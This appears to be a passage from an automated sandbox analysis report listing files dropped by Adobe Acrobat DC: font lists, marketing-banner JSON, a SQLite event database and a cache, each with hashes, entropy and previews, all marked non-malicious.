SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.370964195277026
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJM3g98kUwPeUkwRe9:YvXKXGwJhhpZc0vxZGMbLUkee9
MD5:	F38A0EE430A6C44A7ED01872EA8FA334
SHA1:	0592BF447A73DB7DDB7A49B9A256F0EE722714B7
SHA-256:	47B3BABE3DD81AE8BCDE90DB1793677C0A44FD62920DDDF5415A3D1202DEFD50
SHA-512:	CAD07EA929893BB2EEF53A32E476315DEA270474B1FDF0E3A0B92DC978B49076FBDAC5C271542F8D3BD82CB54264E572D4A0827D64D6DDBA44E66F67AE86E3ED
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.324209878756615
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfBoTfXpnrPeUkwRe9:YvXKXGwJhhpZc0vxZGWTfXcUkee9
MD5:	714F886699A090F8147FFCA2399A53E8
SHA1:	F7D47D66098E6A31AD61A25BE1D68DDF1E6157F8
SHA-256:	7923727963A2C6AEB50456D3CEB771DF58EFD4FF5A6B059E6542D159D7D6B4ED
SHA-512:	790392E409D3B2EEE69EC43EECDAF5783BDFAA8FC584B4691BF29F2B3A1C1476A17DDD9EB44A5E6335C1AB08708D5EF2374600052AB2115E5D18123A10ACC7A8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.30340762672582
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfBD2G6UpnrPeUkwRe9:YvXKXGwJhhpZc0vxZGR22cUkee9
MD5:	E6E5C10CBEBDED62BBB2973DF3462BE7
SHA1:	C4C139FBD5E0929F1E10804CD95C650591EECA79
SHA-256:	A1CE4595C07618B9E5F930F8E7E17EAA18ECE6EA558ADC6A233468B0CA7BE58D
SHA-512:	988B418C2591C8D32740062E595E5E14D0D41566F8329038129639D64AA843178D8D156D9186E136875464DA6683315F68E24DE9638A4215E4A354AB4D8DCA8F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.358241396523408
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfPmwrPeUkwRe9:YvXKXGwJhhpZc0vxZGH56Ukee9
MD5:	47174B4827FF7E45095EABEC532F92AB
SHA1:	419FF664944CE238AD07C9E3CFE98CDFF2FD3E44
SHA-256:	F8FC86AABE8A1E88521ED7CB9A09C7BCC304544AEDB9B02935AD9AD86A502E4A
SHA-512:	1DCB775882F36FC61C22219DA15409DD2F494383D1AE3CE79ACDB92BA3EE2D65099CC0C4A25CDBC5FDCD06C1BE0F08F82D93A83D7E4483D982A5775810B783C6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.692527934239918
Encrypted:	false
SSDEEP:	24:Yv6XGQzvx+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSW:Yv548hgy6SAFv5Ah8cv/W
MD5:	5C7705D18D16CF1025390D59FE7BD089
SHA1:	E6D8A340FBBB321F8287CCA8ECABBDE55E7E092F
SHA-256:	190C5B90747FF519585283E1FB7D3217E7729341B3611A52C77B25D83F32580C
SHA-512:	0828DF1EAC28E4F916ACCEAD5D56D2457DF10F97946365385C8E008BB347712E31C9820F8141AAD7547FD54AB9304818389440443A173EF9CD2ACB1A0893BF44
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.307199204803331
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJf8dPeUkwRe9:YvXKXGwJhhpZc0vxZGU8Ukee9
MD5:	DA42F93CA4B7ED42A10D47995930356F
SHA1:	EE4E593918DB2A65E82804FE6411875C89295826
SHA-256:	09203987CBB585B9AB2A9FCCC2F3B7E0554B418769625145ADA1418C2953D67F
SHA-512:	D95533E51ACEC022929E3E559F480427DD5473902C6670CF91DD93BD3C424921D846E4CE62B5FAC1A9C1D33DC71C375C4FDA3D00E1E42F28EF423BA872D40B3B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.311316675390133
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfQ1rPeUkwRe9:YvXKXGwJhhpZc0vxZGY16Ukee9
MD5:	64CF66220BA42D63152FDFBCA98CE076
SHA1:	41AC01A87F0097688A4AB029232DFCF9D7EA70A5
SHA-256:	AD25B08DF4323A4605E3B19F1C588C2810A056D1AFA6FB0608AFAFF3F0887B8C
SHA-512:	BA7A5A132DCB93A03B7639BAA419C219022B2AA05D97E0B83ADE9A00D5CF3DEDACD2331CC3D8FD24C44E3C6EE18B14CF26A5A7F1A94E0EE443A57DA8AE14660E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.316451604474228
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfFldPeUkwRe9:YvXKXGwJhhpZc0vxZGz8Ukee9
MD5:	A4AB8B3B8654C8E65A96B3849AAB9362
SHA1:	ED9503CB477A4ECA8928822E5256D6091249A481
SHA-256:	8BE0494E8BF198FDE8BDE6FEFBD69674B07557CAAE9AFCE128BB4481A7C8E5A7
SHA-512:	6DE765EFDB4C5C836120E491B1B257C967AF57041C6397E953B38F860A00E84A7B22EEE7985CE0C4D119A6FFEDCD641F3FF6AFFB5A977DEB4B88E6DD142B9BC4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.331825385101427
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfzdPeUkwRe9:YvXKXGwJhhpZc0vxZGb8Ukee9
MD5:	D6A9432CCC593635BC8CFC7650F2E7B6
SHA1:	B944CB5A06FC98285821C8593AB5E79D1B70C571
SHA-256:	63125700B3782271662FCE84FE15377548C5BD3B9288674A8585B4686C8784F2
SHA-512:	738336C61416856E03F97AED50E08BBD9F8E0052632FA6EB4C645982A5B432407E4CEA50CB46B4279021505011FBA5CE9CF0067F45BB715900ABA89C768194C2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.312727849622855
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfYdPeUkwRe9:YvXKXGwJhhpZc0vxZGg8Ukee9
MD5:	166C4252C6DD3A08655AD722EAEE2F49
SHA1:	B895DCB1BA4A619B8CF7D4274ECD6E4812A964FA
SHA-256:	EBD0839054D3DAD55009053FCFBEAAD3F32630DE1BD71F4B373BFBAD9FE683DE
SHA-512:	69D59F60A3288661F9D25FC42E5C5263796D81C5243BFCF1B73E43974ECAF90C4665C5880D521D8A3C96CDF31A63245E3F3E0CCBED001F0DAD4C71E7C07404D0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.299002304305286
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJf+dPeUkwRe9:YvXKXGwJhhpZc0vxZG28Ukee9
MD5:	0A3D0B32AF684C0716C7F49781CDB57C
SHA1:	983BAC656196AA2F8B8AAA05786539F02619C2DD
SHA-256:	6E0B09FED8682D921EF4EB0CEB769D1E9FB831521FB08CB52E97FC20DEFD5794
SHA-512:	FA7169518F9FB94A5EEC288C14AD37D6F1012882277D410570385FE06F67C8571B716667B8025CD39F999D12DE059B818EA180F89F7E685834035EF272C5FF70
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.296187470667008
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfbPtdPeUkwRe9:YvXKXGwJhhpZc0vxZGDV8Ukee9
MD5:	D547EFFB359888BAAA64098EEB94A243
SHA1:	3C2AE4209818E3A3D8073A7C183F49FFCC9F39B3
SHA-256:	4283D5ED9B47A7F1C350AAB0FF1DEC17942B8EA1836597B445E0C8D720C62F2B
SHA-512:	249C44A15996B81C882BC9D5EEE3CEE9F42847326EA7812DE38B0B098838AF62A1AA2CB8C9C2275E7FB373F73CBFFADC9459F2BF0A7F4477E0C792E5A8BD2B88
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.301015095749131
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJf21rPeUkwRe9:YvXKXGwJhhpZc0vxZG+16Ukee9
MD5:	BAD4EC330D2001BDFB8C195D177D2069
SHA1:	C8E502C52BB9F9163736F5949D6C65470BD9AA31
SHA-256:	E37FCCFA9B5333336453EA6BEB1624A21B06D90907E734EDD6F5EEA73C08AF70
SHA-512:	6C9A59BAF21C3146D8249AC8D900D77DB91393CAB42E4B1EAAC23E430F463BF79C6A9760A6F2D1138CB8082AC205345CFC705D37FD7DEEF302933B7C16A05D6F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.672668122286205
Encrypted:	false
SSDEEP:	24:Yv6XGQzvxiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSW:Yv54OBgkDMUJUAh8cvMW
MD5:	99F8E9CD6B5042751FE5D63E0D0DDDE0
SHA1:	EC162D18F8ECB0D7EB18D52128BDAFDA8324368B
SHA-256:	D9241A83C0803F516EA1138F069A4A5EAA55C0865F0E0A88A8BBB43C1CBC30C6
SHA-512:	2996CEF0793F65302FDA9B41FACD19494A4B99D8E83CCFD2A557436F5743963ED307580110AB18B47D274C42837ADB2F4AA881654AA276ED8E26D86A16992DF5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.2774200682242105
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJfshHHrPeUkwRe9:YvXKXGwJhhpZc0vxZGUUUkee9
MD5:	C725DBA97266EBE8850629AB471E3E97
SHA1:	E232EC22F27A77E63C61572BEDD6966C845DFB82
SHA-256:	8CDA453BB1983FAC750DD9838CD9BF2E426E03036312A86602E54A851E0B6916
SHA-512:	046FB5EACC6B59EDC083580841C4E55C0C0782A451E4D096990B81A90DA5F021A2CED440227D306039434EA8AECC253FF7A3579F8571F7E3AE6252C8CFDC36AB
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.290070188981563
Encrypted:	false
SSDEEP:	6:YEQXJ2HXGo7R/9HDhG9VoZcg1vRcR0YsHKoAvJTqgFCrPeUkwRe9:YvXKXGwJhhpZc0vxZGTq16Ukee9
MD5:	5C669A1B9EB5FB3742EBE8565EAC30F2
SHA1:	831280525B017566EB644843AFBEA3160DBC8EFC
SHA-256:	07160CC746807F8A3F7E521422534BEBBBFDDA3B595718233FF5767ED3E4750B
SHA-512:	8D72EC57A147994F10AC51C87F89811266B476517C8F4860010E07647F70B9BA55E9551A1FB99182837AA0E2B8477AE1F81CBE9E076A11A00B91FCD4823CD539
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"1e6348b1-3807-4bb4-88a7-2b897b8d996a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734109788811,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.136995113916399
Encrypted:	false
SSDEEP:	24:YLRaFcWa/ayxNA2RZIZP5ZChI1JscgKcXn4jFj0SMN9V+AA2pTK/f2LS+CeBDY8+:YLRErHCGreaJkfsEUUrBDY8x1vJ1h91o
MD5:	146A42B93520E47CDA5D3EDDCC55C513
SHA1:	7BB618D7FF23E46160B6AF0E4022766E17E81EEB
SHA-256:	164C46386C61DD3724C7CEFB9E0CEC687E138DF52CE3686BB0A91DB349535EF5
SHA-512:	7051FD85C6FD5CFF7EFCBDA63018DB6FF0408D675C4A7A489B3AA26320923CCB11D7A241A4F957E7FF00FC917EDA5D47AEA28302454013CFD05E01EC5E5D6B42
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4ada9e388ba96ce8384f6be136b0b62a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1733936598000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"529054dcd6de174b56a3e389332cae0b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733936598000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"da3f222373111bb23a7b86fe01e0ffea","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733936598000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e6c712e32959e31f52d709d3359478d2","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1733936598000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e08d33badcb7a2ae45c37edf1565745f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1733936598000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"bc4520c954c732a633051733bdc921a9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1882530001199354
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUU6ESvR9H9vxFGiDIAEkGVvpOK:lNVmswUUUUUUUU6E+FGSIt6K
MD5:	F660296D46C879261CBB20930BAF2FE5
SHA1:	7EE8F82B88DD36BDAADB5C0B36CFF48E94A54AAA
SHA-256:	F85D45281865A720E4DC00873B9D8F7B4BDF20F56685FB4D4F6DEAFA0256CC99
SHA-512:	A7A149492C0E037772AD73845009CC3ECF0424469CB0FFE2E6F4EF7F17CAF609FBF1D7518B63E9BFF38300918EA12A7D21869ECE9663B690BBAF7BC588817C2D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6053454376597525
Encrypted:	false
SSDEEP:	48:7MIKUUUUUUUUUU6GvR9H9vxFGiDIAEkGVvwqFl2GL7mso:7kUUUUUUUUUU6qFGSItKKVmso
MD5:	882E6BE239843431570BBB2BF23E2040
SHA1:	694341DF6FF9C8651BB43CDE04A3C9BD42EA1455
SHA-256:	4BED0E74C5B677B45EEA87B694B3095B3646E0652C7687E3486477004B983269
SHA-512:	D3B52604DAE92841E5EF4F78CAAE03CBE1DD41B070D0AA1D87BB6FDDC8F21629D6687D2EB9D411F88308BBC62B62339029054703897C3A84F5E3C22B2F0FB543
Malicious:	false
Preview:	.... .c.....M.N.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgMVEw+vvreIcdCQHVzeex4ABX2/dYyu:6a6TZ44ADEMGw+vvrZcdBX2FK
MD5:	E49348F6A773364A06CCF2C3CAAE62D9
SHA1:	686B33078AA455C4D94DF22B436B399A21D1EA2C
